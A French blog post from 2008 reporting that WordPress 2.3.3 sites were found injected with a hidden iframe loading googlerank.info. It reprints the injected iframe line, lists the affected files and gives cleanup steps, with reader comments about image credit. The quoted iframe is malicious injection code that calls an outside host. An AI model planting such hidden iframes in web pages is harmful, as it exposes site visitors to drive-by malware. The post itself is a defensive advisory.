Faille découverte sur Wordpress 2.3.3

8 mar, 2008 par RomainArticles similairesInfos

Bienvenue sur le Journal du Blog, vous pouvez vous abonner au flux RSS. Merci pour votre visite!

Faille découverte sur Wordpress 2.3.3

Verne de Creative Breafing vient de découvrir la première faille sur la dernière version de Wordpress (2.3.3)

It came to my attention in the last few days that a handful of people had been experiencing some errors when viewing this site. Many visitors had the site return a 404 Page Not Found error page, while others had their browser crash completely. One individual even reported that their anti-virus software had thrown a red flag while visiting this site. My first instinct was that one of the site’s plugins were causing the errors, but upon further investigation, I have found what I believe to be the catalyst: googlerank.info.

Il nous explique que beaucoup de ses utilisateurs rencontraient des problèmes d’erreurs 404 ou de détections de virus lorsqu’ils consultaient son blog. Le problème viendrait selon lui de googlerank.info

Plus précisement cette ligne de code :

<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>

Voici la liste des fichiers concernés par le problème :

  • /wp-admin/admin-footer.php
  • /wp-admin/upload.php
  • /wp-content/themes/yourtheme/footer.php
  • /wp-includes/js/tinymce/blank.htm
  • /wp-includes/js/tinymce/license.htm
  • /wp-includes/js/tinymce/plugins/paste/blank.htm
  • /wp-includes/js/tinymce/plugins/paste/pastetext.htm
  • /wp-includes/js/tinymce/plugins/paste/pasteworld.htm
  • /wp-includes/js/tinymce/themes/advanced/about.htm
  • /wp-includes/js/tinymce/themes/advanced/anchor.htm
  • /wp-includes/js/tinymce/themes/advanced/charmap.htm
  • /wp-includes/js/tinymce/themes/advanced/color_picker.htm
  • /wp-includes/js/tinymce/themes/advanced/image.htm
  • /wp-includes/js/tinymce/themes/advanced/link.htm
  • /wp-includes/js/tinymce/themes/advanced/source_editor.htm

Une solution (temporaire) :

  1. Re-uploadez votre ficiher footer.php file dans le dossier de votre thème. Assurez vous d’avoir supprimer la ligne cité ci dessus au préalable
  2. Si vous utilisez l’editeur de thème via l’admin Wordpress, éditez le ficiher footer.php (pied de page). Cherchez la ligne de code suivante puis supprimez là :<iframe src=http://googlerank.info width=1 height=1 style=display:none></iframe>
  3. Téléchargez la dernière version de Wordpress ici
  4. Copiez les dossier /wp-admin/ et /wp-includes/ sur votre serveur en écrasant les fichiers antérieur, cela remettra en place votre version de Wordpress.

La sortie de la version 2.5 de wordpress va t’elle faire son apparation plus tôt que prévu ?

Crédit photo/montage  : Business Garden 


Vous avez aimé cet article : abonnez-vous au flux RSS !

3 Commentaires »

  1. 4Avatars v0.3.1 v0.3.1

    Wordpress 2.5 arrive participez à la traduction | Le Journal du Blog le 9 mars 2008:

    [...] vous parlais dernièrement d’une faille dans la version 2.3.3 qui pourrait précipiter la sortie de la version 2.5 de Wordpress. Cette [...]

  2. 4Avatars v0.3.1 v0.3.1

    ronan / Business Garden le 11 mars 2008:

    Tient, c’est amusant (mais assez décevant) de retrouver un montage que j’avais fait pour illustrer un de mes articles sans la moindre citation ou petit lien (blogroll ou autre) :)

    http://www.business-garden.com.....danger.png
    http://tinyurl.com/2ojxy9

  3. 4Avatars v0.3.1 v0.3.1

    Romain le 11 mars 2008:

    Effectivement Ronan, j’ai trouvé ça sur Google image sans faire attention à la source. Je rajoute un crédit de suite. Vraiment désolé, merci pour ton intervention.

Rediger un commentaire